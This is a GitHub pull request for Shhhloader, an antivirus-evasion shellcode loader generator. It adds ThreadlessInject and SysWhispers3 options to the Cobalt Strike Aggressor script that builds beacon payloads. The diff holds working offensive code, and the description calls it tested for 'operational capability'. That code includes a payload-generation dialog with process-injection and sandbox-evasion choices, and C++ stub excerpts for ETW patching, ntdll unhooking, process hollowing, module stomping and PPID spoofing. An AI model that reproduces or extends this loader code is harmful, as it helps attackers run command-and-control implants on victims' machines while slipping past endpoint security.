### PR TITLE
Updated Agressor Script to work with ThreadlessInject and Syswhispers3 

### DIFF
--- a/Shhhloader.cna
+++ b/Shhhloader.cna
@@ -22,6 +22,12 @@ $ollvm = "";
 $outname = "";
 $payload_type = "";
 
+#Variables for threadless inject
+$cp = "";
+$td = "";
+$ef = "";
+$ti = "";
+
 # Variables for flags
 $np = "";
 $vb = "";
@@ -30,7 +36,7 @@ $dll = "";
 $dp = "";
 $sa = "";
 $sb = "";
-$gs = "";
+$sc = "";
 $ol = "";
 $we = "";
 $proc = "";
@@ -73,23 +79,30 @@ popup Shhhloader {
 sub Shhhloader {
     local('$dialog %defaults');
     %defaults["injection_process"] = "explorer.exe";
+    %defaults["td"] = "ntdll.dll";
+    %defaults["ef"] = "NtClose";
 
     $dialog = dialog("Shhhloader Payload Generator", %defaults, &mainCallback);
-    dialog_description($dialog, "AV Might Hear Us!!! (#) for optional, (*) for required options.");
+    dialog_description($dialog, "AV Might Hear Us!!! (#) for optional, (*) for required options, (!) for ThreadlessInject");
     drow_listener_stage($dialog, "listener", "(*) Listener: ");
     drow_combobox($dialog, "payload_type", "(*) Payload Type: ", @("Stageless", "Staged"));
-    drow_combobox($dialog, "injection_method", "(*) Injection Method: ", @("QueueUserAPC", "ModuleStomping", "ProcessHollow", "EnumDisplayMonitors", "RemoteThreadContext", "RemoteThreadSuspended", "CurrentThread"));
-    drow_combobox($dialog, "syscall_method", "(*) Syscall Method: ", @("SysWhispers2", "GetSyscallStub"));
+    drow_combobox($dialog, "injection_method", "(*) Injection Method: ", @("QueueUserAPC", "ThreadlessInject" ,"ModuleStomping", "ProcessHollow", "EnumDisplayMonitors", "RemoteThreadContext", "RemoteThreadSuspended", "CurrentThread"));
+    
+    drow_combobox($dialog, "syscall_method", "(*) Syscall Method: ", @("SysWhispers3","SysWhispers2", "GetSyscallStub","None"));
     drow_combobox($dialog, "encoding_method", "(*) Encoding Method: ", @("XOR", "English Words"));
     drow_combobox($dialog, "file_type", "(*) File Type: ", @("exe", "dll"));
-    drow_combobox($dialog, "sandbox", "(#) Sandbox Evasion: ", @("domain", "hostname", "username", "sleep", "none"));
+    drow_combobox($dialog, "sandbox", "(#) Sandbox Evasion: ", @("sleep", "hostname", "username", "domain", "none"));
     drow_text($dialog, "sandboxarg", "(#) Sanbox Argument: ");
     drow_text($dialog, "injection_process", "(#) Injection Process: ");
     drow_text($dialog, "outname", "(#) Output File Name: ");
     drow_text($dialog, "dllproxy", "(#) DLL Proxy: ");
+    drow_text($dialog, "td", "(!) Target DLL: ")
+    drow_text($dialog, "ef", "(!) Export Function: ")
+    drow_checkbox($dialog, "cp", "(!) Create Process: ");
     drow_checkbox($dialog, "ollvm", "(#) Enable Obfuscator-LLVM (OLLVM)");
     drow_checkbox($dialog, "noppid", "(#) Disable PPID Spoofing");
     drow_checkbox($dialog, "verbose", "(#) Verbose");
+
     dbutton_action($dialog, "Generate Payload");
     dbutton_help($dialog, "https://github.com/icyguider/Shhhloader");
     dialog_show($dialog);
@@ -127,7 +140,18 @@ sub mainCallback {
     $ollvm = $3["ollvm"];
     $outname = $3["outname"];
     $payload_type = $3["payload_type"];
+    $syscall_method = $3["syscall_method"];
+    $td = $3["td"];
+    $ef = $3["ef"];
+    $cp = $3["cp"];
 
+    if ($injection_method eq "ThreadlessInject") {
+        if (($td eq "") || ($ef eq "")) {
+            show_message("The arguments for ThreadlessInject must be specified! Try again.");
+            exit();
+        }
+    }
+    
     if (($sandbox eq "domain") || ($sandbox eq "user") || ($sandbox eq "hostname")) {
         if ($sandboxarg eq "") {
             show_message("Selected sandbox evasion method requires an argument! Try again.");
@@ -161,9 +185,7 @@ sub mainCallback {
     {
         $sb = "-s $sandbox "
     }
-    if ($syscall_method eq "GetSyscallStub") {
-        $gs = "-g ";
-    }
+    
     if ($ollvm eq "true"){
         $ol = "-l ";
     }
@@ -173,10 +195,17 @@ sub mainCallback {
     if ($outname eq "") {
         $outname = "a.$ext";
     }
+    
+    if ($cp eq "true"){
+        $ti = "-td $td -ef $ef -cp"
+    }
+    else {
+        $ti = "-td $td -ef $ef "
+    }
 
     $proc = "-p $injection_process";
     if ($payload_type eq "Stageless") {
-        $shellcode = artifact_payload($3["listener"], "raw", "x64");
+        $shellcode = artifact_payload($3["listener"], "raw", "x64", "process", "Direct");
     }
     if ($payload_type eq "Staged") {
         $shellcode = artifact_stager($3["listener"], "raw", "x64");
@@ -189,7 +218,7 @@ sub GeneratePayload {
     writeb($handle, $shellcode);
     closef($handle);
 
-    $build_cmd = "python3 Shhhloader.py beacon.bin -m $injection_method $sb$sa$proc -o $outname $np$vb$ns$dll$gs$ol$we$dp";
+    $build_cmd = "python3 Shhhloader.py beacon.bin -m $injection_method $ti -sc $syscall_method $sb$sa$proc -o $outname $np$vb$ns$dll$ol$we$dp";
 
     #Uncomment to debug call to python builder
     #show_message($build_cmd);

--- a/Shhhloader.cna
+++ b/Shhhloader.cna
@@ -87,7 +87,6 @@ sub Shhhloader {
     drow_listener_stage($dialog, "listener", "(*) Listener: ");
     drow_combobox($dialog, "payload_type", "(*) Payload Type: ", @("Stageless", "Staged"));
     drow_combobox($dialog, "injection_method", "(*) Injection Method: ", @("QueueUserAPC", "ThreadlessInject" ,"ModuleStomping", "ProcessHollow", "EnumDisplayMonitors", "RemoteThreadContext", "RemoteThreadSuspended", "CurrentThread"));
-    
     drow_combobox($dialog, "syscall_method", "(*) Syscall Method: ", @("SysWhispers3","SysWhispers2", "GetSyscallStub","None"));
     drow_combobox($dialog, "encoding_method", "(*) Encoding Method: ", @("XOR", "English Words"));
     drow_combobox($dialog, "file_type", "(*) File Type: ", @("exe", "dll"));
@@ -196,11 +195,11 @@ sub mainCallback {
         $outname = "a.$ext";
     }
     
-    if ($cp eq "true"){
-        $ti = "-td $td -ef $ef -cp"
+    if (($cp eq "true") && ($injection_method eq "ThreadlessInject")){
+        $ti = " -td $td -ef $ef -cp"
     }
-    else {
-        $ti = "-td $td -ef $ef "
+    else if (($cp eq "false") && ($injection_method eq "ThreadlessInject")){
+        $ti = " -td $td -ef $ef"
     }
 
     $proc = "-p $injection_process";
@@ -218,7 +217,7 @@ sub GeneratePayload {
     writeb($handle, $shellcode);
     closef($handle);
 
-    $build_cmd = "python3 Shhhloader.py beacon.bin -m $injection_method $ti -sc $syscall_method $sb$sa$proc -o $outname $np$vb$ns$dll$ol$we$dp";
+    $build_cmd = "python3 Shhhloader.py beacon.bin -m $injection_method$ti -sc $syscall_method $sb$sa$proc -o $outname $np$vb$ns$dll$ol$we$dp";
 
     #Uncomment to debug call to python builder
     #show_message($build_cmd);

--- a/Shhhloader.py
+++ b/Shhhloader.py
@@ -10,8 +10,8 @@ inspiration = """
 ┳┻|
 ┻┳|
 ┳┻| _
-┻┳| •.•)  - Shhhhh, AV might hear us! 
-┳┻|⊂ﾉ   
+┻┳| •.•)  - Shhhhh, AV might hear us!
+┳┻|⊂ﾉ
 ┻┳|
 """
 
@@ -25,7 +25,7 @@ stub = """
 #include <tchar.h>
 #include "skCrypter.h"
 REPLACE_ME_SYSCALL_INCLUDE
-#ifndef UNICODE  
+#ifndef UNICODE
 typedef std::string String;
 #else
 typedef std::wstring String;
@@ -451,7 +451,7 @@ char NtOpenSec[] = { 'N','t','O','p','e','n','S','e','c','t','i','o','n', 0 };
 myNtMapViewOfSection NtMapViewOfSection = (myNtMapViewOfSection)(GetProcAddress(GetModuleHandleA(Nt), NtMapVOS));
 myNtOpenSection NtOpenSection = (myNtOpenSection)(GetProcAddress(GetModuleHandleA(Nt), NtOpenSec));
 
-// Init vars for other API functions, will define after we have a chance to unhook ntdll 
+// Init vars for other API functions, will define after we have a chance to unhook ntdll
 myNtAllocateVirtualMemory NtAllocateVirtualMemory;
 myNtWriteVirtualMemory NtWriteVirtualMemory;
 myNtProtectVirtualMemory NtProtectVirtualMemory;
@@ -604,7 +604,7 @@ int PrintModules(DWORD processID)
                     //_tprintf(TEXT("\\t%s (0x%08X)\\n"), szModName, hMods[i]);
                     return 2;
                 }
-                
+
             }
         }
     }
@@ -794,11 +794,11 @@ PROCESS_INFORMATION SpawnProc(LPSTR process, HANDLE hParent) {
     InitializeProcThreadAttributeList(NULL, 2, 0, &attributeSize);
     si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
     InitializeProcThreadAttributeList(si.lpAttributeList, 2, 0, &attributeSize);
-    
+
     DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
     UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);
     REPLACE_PPID_SPOOF
-    
+
     si.StartupInfo.cb = sizeof(si);
     si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT | STARTF_USESHOWWINDOW;
     si.StartupInfo.wShowWindow = SW_HIDE;
@@ -862,7 +862,7 @@ BOOL DisableETW(void) {
     char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0 };
     char sntdll[] = { 'n','t','d','l','l', 0 };
 
-    //      xor rax, rax; 
+    //      xor rax, rax;
     //      ret
     char patch[] = { 0x48, 0x33, static_cast<char> (0xc0), static_cast<char> (0xc3) };
 
@@ -909,7 +909,7 @@ LPVOID MapNtdll() {
         safe_print(skCrypt("[!] Failed in NtOpenSection (%u)\\n"), GetLastError());
         return NULL;
     }
-    
+
     PVOID pntdll = NULL;
     ULONG_PTR ViewSize = NULL;
     PVOID JUNKVAR = NULL;
@@ -1019,7 +1019,7 @@ UINT_PTR findMemoryHole(HANDLE proc, UINT_PTR exportAddr, SIZE_T size)
 
     return foundMem ? remoteLdrAddr : 0;
 }
-//END THREADLESS 
+//END THREADLESS
 """
 
 threadless_inject_create_stub = """
@@ -1203,12 +1203,12 @@ module_stomping_stub = """
     PROCESS_INFORMATION pi = SpawnProc((LPSTR)skCrypt("REPLACE_ME_PROCESS"), hParent);
     if (pi.hProcess == INVALID_HANDLE_VALUE || pi.hThread == INVALID_HANDLE_VALUE)
         return 0;
-    
+
     processHandle = pi.hProcess;
 
     LPVOID test = (LPVOID)GetProcAddress(LoadLibraryA(TEXT("Kernel32.dll")), skCrypt("LoadLibraryExA"));
     unsigned char adr[8];
-    *(uintptr_t*)adr = (uintptr_t)test; 
+    *(uintptr_t*)adr = (uintptr_t)test;
 
     unsigned char shim[] =  {0x48, 0xB8, adr[0], adr[1], adr[2], adr[3], adr[4], adr[5], adr[6],adr[7],
             0x49, 0xC7, 0xC0, 0x01, 0x00, 0x00, 0x00,
@@ -1227,7 +1227,7 @@ module_stomping_stub = """
     safe_print(skCrypt("NtAllocateVirtualMemory res (allocModule): "), res);
     res = NtAllocateVirtualMemory(processHandle, &allocShim, 0, &shimSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
     safe_print(skCrypt("NtAllocateVirtualMemory res (allocShim): "), res);
-    
+
     auto eString = skCrypt("allocShim:   ");
     printf("%s%#p\\n", eString.decrypt(), allocShim);
     eString.clear();
@@ -1351,7 +1351,7 @@ process_hollow_stub = """
     PROCESS_INFORMATION pi = SpawnProc((LPSTR)skCrypt("REPLACE_ME_PROCESS"), hParent);
     if (pi.hProcess == INVALID_HANDLE_VALUE || pi.hThread == INVALID_HANDLE_VALUE)
         return 0;
-    
+
     HANDLE hProcess = pi.hProcess;
     HANDLE hThread = pi.hThread;
     PROCESS_BASIC_INFORMATION bi;
@@ -1410,7 +1410,7 @@ process_hollow_stub = """
     else{
         safe_print(skCrypt("NtReadVirtualMemory read first 0x200 bytes of the PE structure successfully."));
     }
-    
+
     uint32_t e_lfanew = *reinterpret_cast<uint32_t*>(data + 0x3c);
     //std::cout << "e_lfanew: " << e_lfanew << std::endl;
     uint32_t entrypointRvaOffset = e_lfanew + 0x28;
@@ -1545,7 +1545,7 @@ CurrentThread_stub = """
         safe_print(skCrypt("NtResumeThread resumed created thread successfully."));
     }
 
-    res = NewNtWaitForSingleObject(thandle, -1, NULL);   
+    res = NewNtWaitForSingleObject(thandle, -1, NULL);
 """
 
 EnumDisplayMonitors_stub = """
@@ -1621,7 +1621,7 @@ QueueUserAPC_stub = """
     PROCESS_INFORMATION pi = SpawnProc((LPSTR)skCrypt("REPLACE_ME_PROCESS"), hParent);
     if (pi.hProcess == INVALID_HANDLE_VALUE || pi.hThread == INVALID_HANDLE_VALUE)
         return 0;
-    
+
     HANDLE hProcess = pi.hProcess;
     HANDLE hThread = pi.hThread;
 
@@ -1816,7 +1816,7 @@ RemoteThreadContext_stub = """
     PROCESS_INFORMATION pi = SpawnProc((LPSTR)skCrypt("REPLACE_ME_PROCESS"), hParent);
     if (pi.hProcess == INVALID_HANDLE_VALUE || pi.hThread == INVALID_HANDLE_VALUE)
         return 0;
-    
+
     HANDLE hProcess = pi.hProcess;
 
     res = NtAllocateVirtualMemory(hProcess, &base_addr, 0, &pnew, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
@@ -1950,7 +1950,7 @@ unhook_call = """
         safe_print(skCrypt("Failed to map NTDLL"));
         return -1;
     }
-    
+
 
     if (!Unhook(nt)) {
         safe_print(skCrypt("Failed in Unhooking!"));


### PR DESCRIPTION
## Threadless Inject

- This was a new option added by you in the previous update, I have incorporated it in the Agressor Script along with all the other flags which go with it.
- I have tested the payload generation with various mixing of options to see if any error occurs.
- I have added a few new fields required for ThreadlessInject, which are ignored if the user does not select it. It comes with default options if the user does not want to change anything.

## Syscall Methods
- I have incorporated Syswhispers3 and None into the dropdown menu, even though putting "None" doesn't make sense, it was present as a flag in your Python script and I just added it in case a user wants it.
- All the new syscalls added are working seamlessly with your tool and should not give any errors while compiling

## Other changes
- I have removed trailing spaces from your files
- I have also removed some old used variables in your aggressor script which weren't applicable after you made the new changes in the Python script.

## I have attached screenshots below, all the code has been tested thoroughly for both operational capability and user interaction

![syscall-methods](https://github.com/icyguider/Shhhloader/assets/70212373/8d3f9296-1b4d-4f0b-abcb-a7e7b0c2e892)
![injection-methods](https://github.com/icyguider/Shhhloader/assets/70212373/e739f14b-e505-40c0-94f2-2acd16bf6a17)
![new-changes](https://github.com/icyguider/Shhhloader/assets/70212373/fbf7478c-6d62-4aee-aed9-d42bb4c0875b)
